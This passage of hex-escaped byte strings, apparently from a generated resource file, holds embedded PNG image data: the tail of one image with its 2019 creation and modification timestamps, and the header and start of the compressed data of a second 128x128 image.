\\x0f\\xf5\\xcb\\xf1\\x39\\xb0\\xb6\\\n\\x92\\xe3\\xa8\\x38\\x1c\\x9a\\x40\\x13\\xe9\\x1f\\xae\\x92\\x3c\\x01\\x98\\x02\\\n\\x4c\\x01\\xa6\\x80\\x5b\\xb7\\xc4\\xe1\\x0c\\xeb\\xf4\\x52\\x05\\x74\\xe5\\x42\\\n\\x00\\xd6\\xac\\x29\\xf3\\xeb\\x2f\\xe2\\x43\\x1a\\x2c\\xfd\\x9c\\x7c\\xb3\\xaf\\\n\\x2a\\x4a\\x15\\xc5\\xf3\\x4a\\x77\\x87\\xb5\\x09\\x61\\x5c\\x24\\x17\\xa9\\x56\\\n\\x4b\\x5d\\x2e\\x37\\x84\\x9e\\x62\\xe6\\x1f\\x7f\\x94\\xf5\\xf5\\xf4\\x29\\x6c\\\n\\x84\\x8d\\xe5\\xf8\\x1c\\x58\\x5b\\x10\\x64\\xc3\\x88\\xe4\\x64\\xb9\\xe6\\x07\\\n\\xc8\\x76\\xea\\x29\\x8e\\x63\\x42\\x21\\x45\\xd1\\xea\\xec\\x6c\\x79\\x7b\\xa9\\\n\\x1c\\x8e\\x81\\x0b\\x6c\\xdd\\xbc\\x59\\xef\\x6c\\x00\\x03\\x94\\x7d\\x9f\\x77\\\n\\xda\\x4e\\xa9\\x58\\xef\\xc6\\x0d\\xa9\\x9b\\x43\\xc5\\xc2\\x79\\xf4\\x69\\xdb\\\n\\x56\\xe9\\x6e\\xb1\\x36\\x5a\\x0b\\xc3\\xb9\\x5d\\x32\\xc4\\xdd\\x06\\x9d\\xa8\\\n\\x65\\xd9\\x3f\\x6f\\x7a\\xbd\\xf1\\x07\\xe3\\x0f\\x5b\\xb6\\x94\\x2e\\xa1\\x56\\\n\\x55\\x68\\x29\\x91\\xf6\\x9b\\x4c\\x45\\x40\\xd1\\x42\\xe1\\xb4\\x69\\x72\\x55\\\n\\x23\\x5b\\x02\\x10\\x27\\x30\\xd8\\xf5\\xa2\\x27\\xc2\\xc5\\x0e\\x1d\\xa0\\x35\\\n\\x9d\\x80\\xae\\xc9\\xc9\\x56\\xbf\\x34\\x10\\xd7\\xc8\\x5b\\x02\\xa1\\x34\\x6c\\\n\\xee\\x5c\\x9d\\x8b\\xf1\\x94\\xa1\\xc3\\xc8\\x91\\x96\\xff\\x2c\\xfb\\x35\\x15\\\n\\xb7\\x8d\\xdb\\x06\\x21\\x32\\x6c\\x2c\\xf1\\x14\\x7b\\xd0\\x48\\x3f\\x3f\\xab\\\n\\xf5\\x47\\x15\\x81\\x6d\\x20\\x1a\\xd6\\x4a\\x1f\\xb7\\xf0\\x2a\\xb5\\xa6\\xd6\\\n\\x57\\xaf\\x96\\xef\\x5d\\x44\\x96\\x89\\x58\\x23\\x46\\xc0\\x53\\xba\\x8a\\xb9\\\n\\xf3\\xe7\\x5b\\x7d\\x0d\\x44\\xf1\\xb8\\x18\\x0d\\x8f\\x21\\x3c\\x29\\xa9\\x28\\\n\\x12\\x80\\x74\\x1d\\x3a\\x94\\x9e\\x51\\xcb\\xc4\\xea\\x77\\xe9\\xc5\\xe1\\x0c\\\n\\x55\\x1c\\x00\\x80\\xaf\\x2f\\xae\\x12\\x78\\x74\\x97\\x60\\x2a\\xa8\\x28\\x1c\\\n\\x86\\xc3\\x38\\x22\\x61\\x19\\x8d\\xc5\\x75\\xb9\\xb9\\x82\\x5e\\xa5\\x15\\xf4\\\n\\x67\\xcf\\x5a\\x4e\\xa1\\xca\\x7e\\x6d\\xf8\\x67\\xa5\\x0b\\x80\\x74\\x32\\xb7\\\n\\x13\\xda\\xe7\\xe5\\x49\\xd6\\xde\\x92\\xc7\\x7f\\x31\\xc4\\x7e\\x8e\\xdd\\x0c\\\n\\x67\\x67\\xcb\\xe3\\xbf\\x35\\x77\\x54\\xc0\\x32\\xa5\\xda\\xc9\\x89\\x76\\x14\\\n\\xc5\\x14\\x7f\\x99\\x97\\x27\\xd9\\x12\\x62\\x25\\x53\\x81\\x9f\\xb7\\x36\\xb7\\\n\\x2d\\x7e\\xf3\\x95\\x57\\x2c\\x53\\xbf\\xef\\xde\\xad\\x68\\x71\\x96\\xcf\\xa9\\\n\\xa3\\x23\\xa7\\x35\\xeb\\x39\\x6d\\xdb\\xb6\\x1c\\x87\\xdd\\x88\\xa4\\x5f\\xe1\\\n\\x88\\x26\\x73\\x26\\xca\\x7a\\xf4\\x48\\xc8\\xc0\\xb1\\x38\\xf6\\xdc\\xb9\\xac\\\n\\x75\\x59\\xeb\\xb2\\xd6\\x49\\xf8\\xf9\\xfa\\x0b\\x55\\x77\\x98\\xae\\x8a\\xf2\\\n\\xe8\\xcc\\x2f\\x56\\xef\\xbd\\x76\\x4d\\xf2\\xc5\\x30\\xd3\\xa0\\x88\\x0a\\xa7\\\n\\x4e\\xd5\\xb9\\x19\\x73\\x8c\\x39\\x09\\x09\\x4a\\xc7\\x29\\x17\\x6d\\x1e\\xef\\\n\\xa7\\x49\\x08\\x0f\\xc7\\x4e\\xa8\\x87\\x58\\xe9\\x9e\\x7a\\xa4\\x38\\x28\\x82\\\n\\xd6\\xbf\\xff\\xae\\x0f\\x36\\xe6\\x18\\xf6\\x78\\x7b\\x2b\\x1d\\x67\\x75\\x61\\\n\\x73\\xc3\\x4f\\x95\\x45\\x23\\x70\\x2d\\xb6\\xfc\\xe9\\x27\\xc9\\xcb\\x6d\\x04\\\n\\x73\\x60\\xce\\xac\\x59\\x96\\x6f\\xc8\\x5a\\xb5\\x94\\x8e\\x53\\x6a\\xa5\\x71\\\n\\xdd\\x44\\x1f\\x28\\x92\\x7e\\x0d\\x3f\\xdc\\x00\\x3b\\x69\\x6e\\x79\\xe7\\xfe\\\n\\x33\\x2c\\x01\\x94\\x13\\xf5\\xa5\\x62\\xb4\\xdf\\xb5\\x4b\\xea\\x72\\xc5\\x85\\\n\\x2d\\xa8\\x45\\xd1\\xeb\\x45\\xaf\\xcf\\x99\\xa3\\x74\\x9c\\x52\\xa3\\x7f\\x14\\\n\\xa5\\x14\\xa5\\xcc\\x9b\\x87\\x21\\x90\\x0c\\xcb\\x9a\\x37\\x97\\xba\\x7c\\xdc\\\n\\x8d\\x1d\\xb1\\x63\\xd9\\x77\\x67\\x66\\x2c\\x58\\x02\\x28\\xa7\\x2c\\xde\\x64\\\n\\xca\\xe2\\x0f\\x1f\\xa6\\x45\\xf0\\x3a\\xf4\\x93\\xfe\\x29\\x2d\\x72\\xa1\\x02\\\n\\x10\\x66\\xcf\\xf6\\xf0\\xe0\\x79\\x9e\\xff\\xd7\\x2e\\xb7\\xd5\\x95\\xfb\\x79\\\n\\xd7\\x22\\xf7\\xf3\\x6f\\xbd\\x45\\x0b\\x60\\x18\\x0c\\x9b\\x35\\x4b\\xf2\\x0a\\\n\\x4a\\x46\\x99\\x32\\xc1\\x00\\x06\\x38\\x72\\x44\\xe9\\x78\\xab\\x1b\\x96\\x00\\\n\\x2a\\xc4\\x6c\\xe6\\x86\\xe0\\xf7\\x90\\xf0\\x8f\\x7f\\x48\\x5d\\x32\\x0e\\xc0\\\n\\x09\\x18\\x66\\x6f\\x4f\\x8b\\xd0\\x87\\x0b\\x4c\\x49\\xd1\\x6a\\xb5\\x5a\\xad\\\n\\xb6\\xfa\\xcd\\x13\\x10\\x9f\\x06\\xc5\\x16\\xaa\\x44\\xe1\\x58\\x52\\x12\\x46\\\n\\xc1\\xa7\\xb8\\xd0\\xce\\x4e\\xf2\\x8a\\xbe\\xc4\\x9b\\x70\\x54\\x1c\\xc7\\xaf\\\n\\xba\\x13\\xcf\\xaa\\x2a\\x76\\x13\\xb0\\x82\\x4a\\x47\\x05\\x06\\x99\\x7d\\x84\\\n\\x0e\\x46\\xa3\\x5c\\x1b\\x62\\x88\\x37\\xb7\\x60\\x86\\xca\\x91\\xcb\\x08\\x08\\\n\\xb0\\x6c\\x84\\x61\\x32\\x29\\x1d\\xff\\x8b\\xb8\\x3b\\xba\\x3b\\xba\\x3b\\xaa\\\n\\xd5\\xdc\\x2e\\x73\\x3e\\xf1\\xa9\\xa9\\x30\\x05\\xbd\\xa1\\xb0\\x65\\x4b\\xc9\\\n\\x2b\\x2a\\xd9\\x45\\xd8\\xfe\\x66\\x51\\x62\\x61\\x1c\\xcf\\x57\\x76\\x01\\x10\\\n\\x5b\\xc5\\xce\\x00\\x2a\\x48\\xef\\xac\\x77\\xd6\\x3b\\xdf\\xbe\\x0d\\x1c\\xcc\\\n\\xa0\\x89\\x2b\\x56\\xc8\\x55\\x0f\\x46\\x80\\x3d\\x5c\\x7a\\xf5\\x55\\x88\\x31\\\n\\xb7\\x12\\xfa\\x9c\\x3c\\xe9\\xd5\\x45\\x93\\xa0\\x49\\x68\\xdf\\x5e\\xe9\\xf8\\\n\\xff\\x4c\\x6c\\x17\\xb7\\x4a\\xd0\\xd2\\x3b\\x27\\x4f\\xca\\x76\\xe0\\x97\\x20\\\n\\x9e\\x22\\x21\\x64\\xd9\\x32\\x76\\xe0\\x57\\x0e\\x4b\\x00\\x95\\xf4\\xbc\\x8d\\\n\\x39\\xcf\\x9c\\xb7\\x78\\x31\\xed\\x83\\x59\\x14\\x5d\\xf6\\x29\\xa8\\xe5\\x85\\\n\\x73\\xe1\\x37\\xd8\\xdb\\xac\\x99\\x79\\x06\\xd5\\xa6\\xda\\xc7\\x8e\\x69\\x37\\\n\\xf3\\x67\\x35\\xfb\\x16\\x2d\\xf2\\xde\\xe1\\xbd\\xc3\\x7b\\x87\\x83\\x83\\xb5\\\n\\xe3\\x16\\xeb\\xd5\\x8e\\xe1\\x97\\x6b\\xe6\\xc4\\xc4\\x88\\xed\\x92\\x7d\\x47\\\n\\xa0\\x92\\xad\\xc1\\x60\\xbe\\xdd\\x60\\x6e\\xd2\\xd2\\xa5\\xd6\\x8e\\xbb\\xa6\\\n\\x61\\x97\\x00\\x12\\xf1\\x38\\xcd\\xfb\\xbb\\x3b\\x8e\\x18\\x01\\xc3\\xf0\\x0a\\\n\\x35\\xdd\\xb4\\xc9\\x5a\\xf5\\x52\\x22\\xa5\\x43\\xed\\x53\\xa7\\xb8\\x0c\\x87\\\n\\x14\\xbb\\x49\\x41\\x41\\x72\\xef\\x23\\x20\\x5e\\xfa\\xc0\\xb7\\xc5\\xe7\\x04\\\n\\xe7\\x94\\x14\\x5c\\x89\\x13\\x40\\x63\\xbd\\x33\\x12\\x3a\\x81\\x46\\x30\\x0c\\\n\\x1d\\x6a\\x99\\xca\\xbd\\x75\\xab\\xb5\\xea\\xad\\xa9\\xd8\\x19\\x80\\x44\\x74\\\n\\xed\\x4d\\xfb\\xb2\\x0a\\xbe\\xfe\\x9a\\x4e\\xd0\\x34\\x30\\xec\\xde\\x6d\\xad\\\n\\x7a\\x71\\x02\\xbe\\x03\\xcf\\x3a\\x74\\xa0\\xcb\\x45\\x69\\xc5\\xae\\xe2\\x5c\\\n\\x76\\xb9\\xd6\\x61\\x40\\xc4\\x20\\x73\\x57\\x21\\x71\\xcb\\x16\\x6b\\x1f\\xf8\\\n\\xe2\\x14\\x59\\x76\\xe0\\x4b\\x8b\\x25\\x00\\x89\\x15\\xbf\\x05\\xf1\\x02\\x3f\\\n\\x7a\\x34\\xcd\\x04\\x15\\x78\\x5b\\x71\\xa5\\x9f\\x03\\xf0\\x0b\\x44\\xf4\\xe8\\\n\\xa1\\xcd\\x53\\x3b\\xaa\\x1d\\xa5\\x9f\\x63\\x6f\\xd9\\x78\\xa3\\x7b\\x77\\xf8\\\n\\x03\\x0a\\x60\\x43\\xf7\\xee\\x56\\x8b\\xeb\\x2e\\xcc\\xa0\\xe9\\x99\\x99\\xb4\\\n\\x41\\xf5\\x32\\xb7\\x32\\x2c\\xcc\\x6a\\xf5\\xda\\x08\\x96\\x00\\x24\\x66\\x32\\\n\\x99\\x4c\\x26\\xd3\\xbd\\x7b\\xa8\\x11\\x36\\x99\\xe7\\x04\\x06\\xc2\\x70\\x68\\\n\\x08\\x5e\\xf7\\xee\\x59\\xab\\x7e\\x1c\\x0c\\x9f\\xc2\\xa7\\x32\\xac\\x8f\\x1f\\\n\\x8a\\x8b\\xb8\\xa1\\x7d\\xfa\\x58\\x2b\\x0e\\x5a\\x01\\x83\\x61\\x4a\\x7e\\xbe\\\n\\x65\\xb9\\xec\\xc0\\x40\\xb6\\x0d\\xb8\\x3c\\x58\\x02\\x90\\x89\\x2e\\x20\\xbb\\\n\\x4b\\x76\\x97\\xcb\\x97\\xe9\\x6b\\x61\\x27\\xa7\\x0b\\x0a\\xa2\\xaf\\x60\\x1e\\\n\\xcd\\x7d\\xfc\\x58\\xf6\\x8a\\x55\\xa4\\xc1\\xad\\xd2\\x2f\\xc2\\x8a\\x9f\\xd1\\\n\\x0a\\xf0\\x97\\x7e\\x06\\xdf\\x9f\\x89\\x4f\\xe1\\x61\\x22\\x4d\\x17\\x86\\x05\\\n\\x05\\x59\\x1e\\xe2\\x92\\xe1\\x29\\x4c\\x06\\x00\\x58\\x02\\x90\\x9d\\x5e\\x9f\\\n\\xad\\xd5\\xeb\\x8f\\x1d\\x83\\x14\\xe1\\x9e\\xea\\xba\\x9f\\x1f\\x2c\\x84\\xb6\\\n\\x10\\x50\\xf1\\xa7\\xd4\\xfe\\x0a\\x8d\\xc6\\x67\\xf4\\xa1\\x0c\\x4b\\x6d\\xc9\\\n\\x54\\x6e\\xa9\\x76\\xf0\\x00\\xb8\\xfb\\xf7\\xd1\\x1e\\x8f\\xc2\\x1e\\x7f\\x7f\\\n\\xdd\\x6e\\x53\\x73\\x53\\xf3\\x13\\x27\\x64\\xab\\x8f\\x01\\x00\\x96\\x00\\xac\\\n\\x46\\xbf\\x34\\x3b\\x4a\\xbf\\xf4\\xec\\x59\\xa1\\x0e\\x37\\x1c\\xfd\\x3b\\x76\\\n\\x84\\x04\\xca\\x00\\x07\\xf6\\xcd\\x26\\x5e\\xe3\\x63\\x47\\x9a\\x2c\\x0c\\xe9\\\n\\xdc\\x59\\xd7\\xd0\\xb8\\xcc\\xb8\\xec\\xe4\\x49\\xa5\\x9b\\x65\\x2b\\xa4\\x9f\\\n\\x9a\\xc9\\xfc\\x4f\\x59\\xef\\x65\\xbd\\x97\\xf5\\xde\\xb5\\x6b\\x3c\\xcf\\xf3\\\n\\x3c\\xdf\\xa9\\x93\\xbd\\x3d\\x20\\xc7\\xc9\\x77\\x46\\x50\\xd5\\x15\\xbd\\x44\\\n\\x71\\x14\\xd7\\xae\\x9d\\x29\\xdc\\x72\\xef\\x44\\xe9\\xf6\\xd8\\x1a\\x76\\x06\\\n\\xa0\\x10\\xf1\\x66\\xa1\\xd2\\xed\\x50\\x1a\\xeb\\x07\\x65\\xb1\\x04\\xc0\\x30\\\n\\x36\\x8c\\x25\\x00\\x86\\xb1\\x61\\x2c\\x01\\x30\\x8c\\x0d\\x63\\x09\\x80\\x61\\\n\\x6c\\x18\\x4b\\x00\\x0c\\x63\\xc3\\x58\\x02\\x60\\x18\\x1b\\xc6\\x12\\x00\\xc3\\\n\\xd8\\x30\\x96\\x00\\x18\\xc6\\x86\\xb1\\x04\\xc0\\x30\\x36\\x8c\\x25\\x00\\x86\\\n\\xb1\\x61\\x2c\\x01\\x30\\x8c\\x0d\\x63\\x09\\x80\\x61\\x6c\\x18\\x4b\\x00\\x0c\\\n\\x63\\xc3\\x58\\x02\\x60\\x18\\x1b\\xc6\\x12\\x00\\xc3\\xd8\\x30\\x96\\x00\\x18\\\n\\xc6\\x86\\xb1\\x04\\xc0\\x30\\x36\\x8c\\x25\\x00\\x86\\xb1\\x61\\x2c\\x01\\x30\\\n\\x8c\\x0d\\x63\\x8b\\x82\\x2a\\xcd\\x03\\xd4\\xa0\\x21\\x02\\x1d\\x18\\xc1\\x20\\\n\\xc1\\x96\\x5e\\x2e\\xd4\\x0d\\x97\\xb8\\xb9\\x79\\x7a\\xf2\\xbc\\xbb\\x7b\\x48\\\n\\x88\\x54\\xcd\\x14\\x5c\\xa8\\x1b\\x2d\\x71\\x73\\x93\\x6c\\x3b\\xc9\\xff\\x88\\\n\\x5b\\xaa\\x56\\x32\\xe5\\xc5\\x36\\x07\\x55\\x98\\x07\\xc7\\x6f\\x52\\xff\\x74\\\n\\xfb\\x36\\xb8\\xe3\\x7c\\x1c\\xdf\\xb8\\xb1\\xd2\\xed\\xb1\\x9a\\xd6\\x74\\x02\\\n\\x0c\\x79\\x79\\xba\\xdd\\xa6\\xe6\\x06\\x68\\xda\\x54\\xe9\\xe6\\xd8\\x2a\\x76\\\n\\x09\\xa0\\x30\\xda\\x08\\x7d\\x70\\xda\\xcd\\x9b\\x4a\\xb7\\xc3\\xea\\x71\\xcf\\\n\\xc7\\xd6\\x10\\x9c\\x93\\xa3\\x74\\x3b\\x6c\\x1d\\x4b\\x00\\x0a\\xc3\\xe9\\xb8\\\n\\x99\\x26\\x1d\\x3d\\xaa\\x74\\x3b\\xac\\x1e\\x37\\x47\\x1f\\xc0\\xed\\xf4\\x74\\\n\\xa5\\xdb\\x61\\xeb\\x58\\x02\\x50\\x18\\x5d\\x81\\x59\\x30\\x6b\\xd7\\x2e\\xa5\\\n\\xdb\\x61\\x6d\\xf8\\x26\\xb7\\x1c\\x4e\\x5a\\x6f\\x1b\\x75\\xe6\\xbf\\x63\\x09\\\n\\x40\\x61\\x7a\\x67\\x63\\x81\\xb1\\xe0\\xf0\\x61\\x3a\\x01\\x79\\xd0\\xc6\\x06\\\n\\xb6\\xc4\\x8a\\xa1\\x08\\xfa\\xf1\\xe7\\x9f\\x33\\xc1\\x00\\x06\\x60\\x67\\x00\\\n\\x4a\\x63\\x09\\xa0\\x4a\\x20\\xa2\\xed\\xc2\\x10\\xec\\x16\\x1d\\x0d\\xfe\\xf0\\\n\\x0e\\xf8\\x09\\x82\\xd2\\x2d\\x92\\xdc\\x14\\x18\\x09\\x61\\x66\\x33\\xbd\\x04\\\n\\xbf\\xd2\\xe2\\x88\\x08\\x31\\x6e\\xa5\\x9b\\x65\\xeb\\x58\\x02\\xa8\\x22\\xb2\\\n\\xa6\\x65\\xff\\x33\\x6b\\xda\\xd1\\xa3\\xf4\\x2e\\x21\\x78\\xcf\\x9e\\xad\\x74\\\n\\x7b\\x24\\x57\\x1f\\xbe\\xa3\\xad\\xd1\\xd1\\xfa\\xbe\\xa6\\xaf\\x4c\\x5f\\x1d\\\n\\x3f\\xae\\x74\\x73\\x18\\x0b\\xf9\\xb6\\x7b\\x66\\x2a\\xe4\\xde\\xe6\\x07\\x17\\\n\\xee\\xef\\x3f\\x7e\\xbc\\xc1\\x95\\xfa\\xcf\\xeb\\xe7\\xda\\xdb\\x63\\x1a\\xb4\\\n\\x82\\x3d\\x6f\\xbf\\x0d\\xf7\\xe0\\x01\\xdc\\x97\\x60\\x9e\\x80\\xb5\\x88\\xe3\\\n\\xfc\\x5d\\x61\\x10\\x0d\\xf8\\xec\\x33\\xdd\\x2c\\xe3\\x76\\xe3\\xf6\\x98\\x18\\\n\\xa5\\x9b\\xc5\\xfc\\xa7\\xea\\xf3\\x81\\xb2\\x51\\x1e\\xa9\\x6e\\xc7\\x34\\x87\\\n\\x06\\x0f\\x86\\x1c\\x6e\\x3c\\x2c\\x59\\xb6\\x0c\\x16\\xc1\\x13\\xb8\\xea\\xe2\\\n\\xa2\\x74\\xbb\\x5e\\x84\\x16\\xc1\\xeb\\xd0\\x2f\\x27\\x87\\x7a\\x51\\xac\\x30\\\n\\x2d\\x3c\\x3c\\xab\\x91\\xa9\\xa5\\xa9\\xe5\\xce\\x9d\\x4a\\xb7\\x8b\\xf9\\xef\\\n\\xd8\\x25\\x40\\x15\\xa7\\x0b\\xc8\\xee\\x62\\xe8\\xbe\\x7d\\x7b\\xdd\\xfc\\x02\\\n\\xd7\\x67\\xe4\\xe5\\x05\\x59\\xf4\\x77\\x48\\x89\\x8a\\x82\\xd6\\x30\\x91\\x26\\\n\\x9c\\x3d\\x5b\\xfa\\x4d\\x6b\\x6d\\x62\\xbd\\x62\\x3b\\x5a\\xd3\\x09\\x2c\\x9c\\\n\\x39\\xf3\\xd9\\xc3\\xc2\\xc0\\xe7\\x3e\\x5e\\x5e\\xec\\xc0\\xaf\\x1e\\xd8\\x19\\\n\\x40\\x35\\xe7\\x19\\xef\\x19\\xef\\x19\\xdf\\xb8\\x31\\x6e\\x2f\\x56\\x15\\xab\\\n\\xb4\\x5a\\x61\\x12\\x5c\\x84\\x8b\\x4d\\x9b\\xe2\\x27\\xc2\\x0f\\xb8\\xcf\\xc1\\\n\\x41\\xaa\\x7a\\xe8\\x53\\xae\\x2f\\xf9\\x17\\x16\\x72\\xab\\xe1\\x35\\x78\\x2d\\\n\\x37\\x97\\x06\\xdb\\x99\\xed\\xcc\\x7a\\x7d\\x66\\x78\\x66\\x78\\x66\\xf8\\x9d\\\n\\x3b\\x4a\\xf7\\x03\\xc3\\x30\\x0c\\xc3\\x30\\x0c\\xc3\\x30\\x0c\\xc3\\x30\\x0c\\\n\\xc3\\x30\\x0c\\xc3\\x30\\x0c\\xc3\\x30\\x0c\\xc3\\x30\\x0c\\xc3\\x30\\x0c\\xc3\\\n\\x30\\x8c\\xed\\xf9\\x7f\\x46\\xdc\\x29\\xa5\\xaf\\x47\\x67\\x30\\x00\\x00\\x00\\\n\\x25\\x74\\x45\\x58\\x74\\x64\\x61\\x74\\x65\\x3a\\x63\\x72\\x65\\x61\\x74\\x65\\\n\\x00\\x32\\x30\\x31\\x39\\x2d\\x30\\x31\\x2d\\x32\\x38\\x54\\x31\\x30\\x3a\\x31\\\n\\x36\\x3a\\x33\\x38\\x2b\\x30\\x33\\x3a\\x30\\x30\\x5a\\x95\\x3a\\x44\\x00\\x00\\\n\\x00\\x25\\x74\\x45\\x58\\x74\\x64\\x61\\x74\\x65\\x3a\\x6d\\x6f\\x64\\x69\\x66\\\n\\x79\\x00\\x32\\x30\\x31\\x39\\x2d\\x30\\x31\\x2d\\x32\\x38\\x54\\x31\\x30\\x3a\\\n\\x31\\x36\\x3a\\x34\\x31\\x2b\\x30\\x33\\x3a\\x30\\x30\\xb4\\x95\\xce\\x32\\x00\\\n\\x00\\x00\\x00\\x49\\x45\\x4e\\x44\\xae\\x42\\x60\\x82\\\n\\x00\\x00\\x0d\\xc0\\\n\\x89\\\n\\x50\\x4e\\x47\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0d\\x49\\x48\\x44\\x52\\x00\\\n\\x00\\x00\\x80\\x00\\x00\\x00\\x80\\x10\\x06\\x00\\x00\\x00\\x93\\xae\\xbd\\x88\\\n\\x00\\x00\\x00\\x04\\x67\\x41\\x4d\\x41\\x00\\x00\\xb1\\x8f\\x0b\\xfc\\x61\\x05\\\n\\x00\\x00\\x00\\x20\\x63\\x48\\x52\\x4d\\x00\\x00\\x7a\\x26\\x00\\x00\\x80\\x84\\\n\\x00\\x00\\xfa\\x00\\x00\\x00\\x80\\xe8\\x00\\x00\\x75\\x30\\x00\\x00\\xea\\x60\\\n\\x00\\x00\\x3a\\x98\\x00\\x00\\x17\\x70\\x9c\\xba\\x51\\x3c\\x00\\x00\\x00\\x06\\\n\\x62\\x4b\\x47\\x44\\x00\\x00\\x00\\x00\\x00\\x00\\xf9\\x43\\xbb\\x7f\\x00\\x00\\\n\\x00\\x09\\x70\\x48\\x59\\x73\\x00\\x00\\x01\\x80\\x00\\x00\\x01\\x80\\x00\\x1f\\\n\\xe4\\xcb\\x22\\x00\\x00\\x00\\x07\\x74\\x49\\x4d\\x45\\x07\\xe3\\x01\\x1c\\x0d\\\n\\x10\\x29\\x7b\\x03\\x1b\\x75\\x00\\x00\\x0c\\xaf\\x49\\x44\\x41\\x54\\x78\\xda\\\n\\xed\\xdd\\x7b\\x74\\x54\\xd5\\xd9\\x06\\xf0\\x67\\xcf\\x24\\x61\\x02\\x89\\x9a\\\n\\xb0\\xb8\\xa4\\x84\\x99\\x33\\x99\\xa0\\x88\\x5c\\x52\\x42\\x23\\x8d\\x94\\x82\\\n\\x5a\\x14\\xab\\x8d\\x04\\x02\\x28\\x44\\x2e\\x85\\x80\\x88\\x51\\x31\\x50\\x25\\\n\\x48\\x55\\x2e\\xb5\\xf2\\x7d\\x6b\\x41\\x24\\x42\\x10\\x29\\x96\\x04\\x96\\x0d\\\n\\x26\\x1f\\x94\\xf0\\xa9\\x0d\\x16\\x2c\\xa6\\xe1\\x12\\x8c\\x8b\\x94\\xaa\\x24\\\n\\x33\\x93\\x09\\xa2\\xa8\\x90\\xa4\\x2b\\xb4\\x98\\x61\\x66\\xf7\\x8f\\x10\\xda\\\n\\xba\\x56\\x65\\x80\\xc9\\xec\\x9c\\x9c\\xe7\\xf7\\x1f\\xcc\\x64\\x9f\\xf7\\x3d\\\n\\x39\\xe7\\x61\\xcf\\x9e\\x73\\x38\\x00\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\\n\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\\n\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x75\\x36\\x42\\x75\\x01\\x14\\x0a\\x42\\x24\\\n\\x0e\\xb6\\x6e\\xb6\\xcf\\x99\\x36\\x4d\\x2e\\x16\\x37\\xfa\\xef\\xc9\\xca\\x92\\\n\\x7e\\x7c\\x28\\x4e\\x0e\\x1f\\x7e\\xf9\\x2d\\x4e\\x69\\x91\\x69\\x55\\x55\\x28\\\n\\x12\\x95\\x58\\x5c\\x50\\xe0\\x74\\xd6\\xef\\xad\\xdf\\xbb\\x63\\x47\\xdb\\x8b\\\n\\x52\\xaa\\xee\\x80\\x3a\\x06\\x03\\xa0\\x4b\\x33\\x9b\\x1d\\x51\\xd6\\xa5\\x1a\\\n\\x8a\\x8a\\xd0\\x47\\x14\\x41\\x9b\\x32\\x25\\xe0\\x1f\\xcd\\x90\\xef\\xe0\\xae\\\n\\x1d\\x3b\\xea\\x5e\\xf2\\x0c\\x74\\xbf\\x9e\\x99\\xd9\\xf6\\x97\\x3e\\x9f\\xea\\\n\\x8e\\x28\\xb8\\xcc\\xaa\\x0b\\xa0\\x8e\\x91\\x70\\xb7\\x75\\x94\\x36\\x66\\xf9\\\n\\x72\\xe1\\x15\\x07\\x81\\x85\\x0b\\xaf\\x7a\\x80\\x13\\xa2\\x10\\xae\\x21\\x43\\\n\\x62\\x2d\\x37\\x9e\\x89\\xb9\\xe0\\xf5\\x36\\xb6\\x34\\xaf\\x6c\\xba\\xf8\\xfe\\\n\\xfb\\xaa\\xfb\\xa2\\xe0\\x32\\xa9\\x2e\\x80\\x82\\x2b\\x7e\\x51\\xfc\\xa2\\xf8\\\n\\x45\\x91\\x91\\x78\\x5e\\xcc\\x90\\xd3\\x72\\x72\\xae\\x77\\x3c\\x59\\x8d\\x32\\\n\\xff\\x9e\\x25\\x4b\\x34\\x68\\xd0\\x60\\xb1\\xa8\\xee\\x8f\\x82\\x8b\\x1f\\x01\\\n\\xba\\x98\\x01\\xb7\\xda\\x2d\\x76\\xcb\\xe8\\xd1\\xfe\\x56\\x7f\\x1f\\xd9\\xf7\\\n\\xc0\\x81\\x60\\x8d\\xeb\\x7f\\xd2\\x3f\\x56\\x3c\\x3d\\x7a\\xb4\\xeb\\xf1\\x86\\\n\\xad\\xae\\xc7\\xff\\xf4\\x27\\xd5\\x7d\\x52\\x70\\x70\\x06\\xd0\\xc5\\x5c\\x3c\\\n\\xe8\\xab\\xf6\\x55\\xf7\\xea\\x15\\xf4\\x81\\x1f\\x16\\xcf\\xf8\\x7e\\xd2\\xbb\\\n\\xb7\\xea\\xfe\\x28\\xb8\\x18\\x00\\x5d\\x8c\\xf9\\x76\\x8c\\x33\\x8f\\x37\\x05\\\n\\xfd\\xf7\\xda\\x51\\xe3\\x92\\x5a\\xfc\\x85\\x12\\x19\\x18\\x03\\x80\\xc8\\xc0\\\n\\x18\\x00\\x44\\x06\\xc6\\x00\\x20\\x32\\x30\\x06\\x00\\x91\\x81\\x31\\x00\\x88\\\n\\x0c\\x8c\\x01\\x40\\x64\\x60\\x0c\\x00\\x22\\x03\\x63\\x00\\x10\\x19\\x18\\x03\\\n\\x80\\xc8\\xc0\\x18\\x00\\x44\\x06\\xc6\\x00\\x20\\x32\\x30\\x06\\x00\\x91\\x81\\\n\\x31\\x00\\x88\\x0c\\x8c\\x01\\x40\\x64\\x60\\x0c\\x00\\x22\\x03\\x63\\x00\\x10\\\n\\x19\\x18\\x03\\x80\\xc8\\xc0\\x18\\x00\\x44\\x06\\xc6\\x00\\x20\\x32\\x30\\x06\\\n\\x00\\x91\\x81\\x31\\x00\\x88\\x0c\\x8c\\x01\\x40\\x64\\x60\\x0c\\x00\\x22\\x03\\\n\\x63\\x00\\x10\\x19\\x18\\x03\\x80\\xc8\\xc0\\x18\\x00\\x44\\x06\\xc6\\x00\\x20\\\n\\x32\\x30\\x06\\x00\\x91\\x81\\x31\\x00\\x88\\x0c\\x2c\\x4c\\x75\\x01\\x44\\xff\\\n\\x6e\\x0c\\x00\\x20\\x2c\\xcc\\x33\\xc5\\x36\\xd2\\x36\\xf2\\x67\\x3f\\x43\\x84\\\n\\x2c\\x13\\x8f\\xdf\\x75\\x97\\xe8\\x87\\xaf\\xf0\\x5e\\x4c\\x8c\\x7c\\x4a\\x24\\\n\\x21\\xdf\\xe9\\x34\\x2f\\x14\\x17\\x60\\xd9\\xb9\\xf3\\x64\\xb1\\x1b\\x6e\\x54\\\n\\x57\\xab\\xae\\x5b\\xaf\\x18\\x00\\xd7\\x29\\x61\\x49\\xff\\x97\\x13\\x96\\x8c\\\n\\x18\\x61\\x5a\\x27\\xaa\\xfc\\x7f\\x9e\\x38\\xd1\\x5f\\x2d\\x9e\\x91\\x79\\x09